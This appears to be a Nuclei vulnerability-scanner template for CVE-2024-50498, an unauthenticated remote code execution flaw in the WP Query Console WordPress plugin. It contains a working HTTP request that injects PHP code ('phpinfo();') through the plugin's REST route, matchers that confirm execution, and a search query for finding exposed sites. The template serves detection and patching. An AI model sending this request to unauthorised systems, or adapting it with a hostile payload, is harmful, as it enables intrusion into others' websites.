id: CVE-2024-50498 info: name: WP Query Console <= 1.0 - Remote Code Execution author: s4e-io severity: critical description: | Improper Control of Generation of Code ('Code Injection') vulnerability in LUBUS WP Query Console allows Code Injection.This issue affects WP Query Console- from n/a through 1.0. impact: | Attackers can exploit vulnerabilities to compromise the system. remediation: | Update to the latest patched version addressing CVE-2024-50498. reference: - https://github.com/RandomRobbieBF/CVE-2024-50498 - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-query-console/wp-query-console-10-unauthenticated-remote-code-execution - https://patchstack.com/database/vulnerability/wp-query-console/wordpress-wp-query-console-plugin-1-0-remote-code-execution-rce-vulnerability?_s_id=cve - https://nvd.nist.gov/vuln/detail/CVE-2024-50498 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-50498 cwe-id: CWE-94 epss-score: 0.5364 epss-percentile: 0.98858 cpe: cpe:2.3:a:lubus:wp_query_console:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: lubus product: wp_query_console framework: wordpress fofa-query: body="wp-content/plugins/wp-query-console/" tags: cve,cve2024,wp,wordpress,wp-plugin,wp-query-console,rce,vkev,vuln http: - raw: - | POST /index.php?rest_route=/wqc/v1/query HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"queryArgs":"phpinfo();","queryType":"post"} matchers: - type: dsl dsl: - 'contains_all(body, "PHP Extension", "PHP Version")' - 'contains(content_type, "application/json")' - "status_code == 200" condition: and # digest: 4a0a00473045022100973366f1e14c2474408405a7e3b49ea2350cee537630414277345469cd38d895022077f194bacc95078de52da910ce007506bd113b8f924a2d557cddda6d63647cd9:922c64590222798bb761d5b6d8e72950